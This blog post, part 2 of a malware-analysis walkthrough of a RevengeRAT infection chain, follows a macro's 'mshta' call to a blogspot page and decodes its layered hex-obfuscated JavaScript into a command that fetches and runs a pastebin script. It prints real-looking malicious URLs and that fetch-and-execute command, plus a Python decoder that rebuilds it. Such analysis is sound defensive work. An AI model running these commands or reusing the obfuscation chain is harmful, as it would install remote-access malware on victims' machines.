RevengeRAT (Part 2) – Pastebin, Javascript, and StrReverse(StrReverse(“stuff”))

Continuing our walk-through, we now get outside of the document itself and see what happens next.

Part 1: Getting through the macros.

Part 2: Analysis of javascript from blogspot site to the first pastebin page.

Part 3: Analysis of javascript on remaining pastebin pages.


We left off with the macro running this command:

mshta http://bitly.com/6hjxasxsxassh6

So we need to find out what happens next. Using whatever site/mechanism you prefer to expand shortened links, you will see that the URL takes you to a blogspot site, of all things.

https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

Having seen this sort of behavior before, I’m not going to actually visit the site. Remember, our goal is to learn what is happening purposefully, rather than learning what is happening accidentally. In this case, I’m pretty sure that the site contains a monstrous chunk of javascript that I don’t want running. This means I’m going to use PowerShell to download the page as a file, so that I can investigate it at my leisure.

PS C:\path\to\wherever> Invoke-WebRequest -Uri "https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html" -OutFile "C:\Path\to\wherever\site.html"

Full disclosure, I can neither write nor read html. However, I have learned that huge chunks of javascript like this are suspicious and deserve more attention.

[Screenshot: tesla06.PNG]

I found CyberChef to be extremely handy when working with this. We can copy out the hex in the javascript command and make use of the “From Hex” recipe.

[Screenshot: tesla07.PNG]

Looking at the output below, we see… more javascript? Yes: we will find that there are multiple layers of obfuscated javascript. This means we take the hex from the output, copy it back into the input, and lather, rinse, and repeat until we get something useful like this:

[Screenshot: tesla08.PNG]

Lines 8-9 contain the last two rounds of obfuscated javascript. Lines 10-20 contain what is actually going to run. Looking carefully at line 11 we see the infamous double StrReverse.

(sigh)
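The lather-rinse-repeat step and the StrReverse folding are easy to automate so you never have to run the script. The following Python decoder is an added example (mine, not code from the original post); the sample blob, the fromHex wrapper name and the variable layout are constructed to mirror what the screenshots show, and the hex layers are peeled statically, nothing is executed.

```python
import re

# Constructed sample blob (not the real blogspot page): three hex layers nested
# the way the post's screenshots show, with the AS_ww pieces in the innermost one.
# "fromHex" is a stand-in name for whatever decode routine the real script used.
INNER = ('var AS_ww0 = "mshta"; '
         'var AS_ww1 = StrReverse(StrReverse("http://www.pastebin.com/raw/")); '
         'var AS_ww2 = "qykTeRnR";')

def wrap_hex(js):
    """Wrap one layer as a hex literal, the way the obfuscator does."""
    return 'eval(fromHex("' + js.encode().hex() + '"))'

SAMPLE = wrap_hex(wrap_hex(wrap_hex(INNER)))

HEX_RUN = re.compile(r'(?:[0-9a-fA-F]{2}){20,}')  # long, even-length literals only
STRREV = re.compile(r'StrReverse\(StrReverse\(("[^"]*")\)\)')
ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"')

def peel_hex_layer(js):
    """Decode every long hex literal in place; None when no layer is left."""
    if not HEX_RUN.search(js):
        return None
    return HEX_RUN.sub(lambda m: bytes.fromhex(m.group(0)).decode('latin-1'), js)

def peel_all(js, max_layers=10):
    """Lather, rinse, repeat: returns (fully decoded text, number of layers)."""
    layers = 0
    while layers < max_layers:
        nxt = peel_hex_layer(js)
        if nxt is None:
            break
        js, layers = nxt, layers + 1
    return js, layers

def fold_strreverse(js):
    """StrReverse(StrReverse(x)) is just x; collapse it so strings read plainly."""
    return STRREV.sub(r'\1', js)

def recover_strings(js):
    """Map each var name to its string literal after folding the reverses."""
    return dict(ASSIGN.findall(fold_strreverse(js)))

def recover_command(blob):
    """Peel every layer, then rebuild the command the way lines 12-17 do."""
    s = recover_strings(peel_all(blob)[0])
    return s['AS_ww0'] + ' ' + s['AS_ww1'] + s['AS_ww2']
```

On the real page the hex literal would be pasted in place of SAMPLE; the layer count tells you how many CyberChef rounds you saved.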

Anyway, line 15 (var Zwk) is where the string gets put together. Line 18 (var AS_ww) contains the completed string and is where it is executed. After a little bit of analysis you can see this command being run:

12. AS_ww1 = http://www.pastebin.com/raw/
13. AS_ww0 = mshta
14. AS_ww2 = qykTeRnR
17. AS_ww = http://www.pastebin.com/raw/qykTeRnR

So download what’s on pastebin and execute it? Looks like we’re headed to pastebin!

[Screenshot: tesla09.PNG]

More javascript… Alrighty. Back to CyberChef and about three rounds later we get:

[Screenshot: tesla10.PNG]

This script is split up into four distinct parts. We’ll look at each of them in turn in the next post.

To part 3!
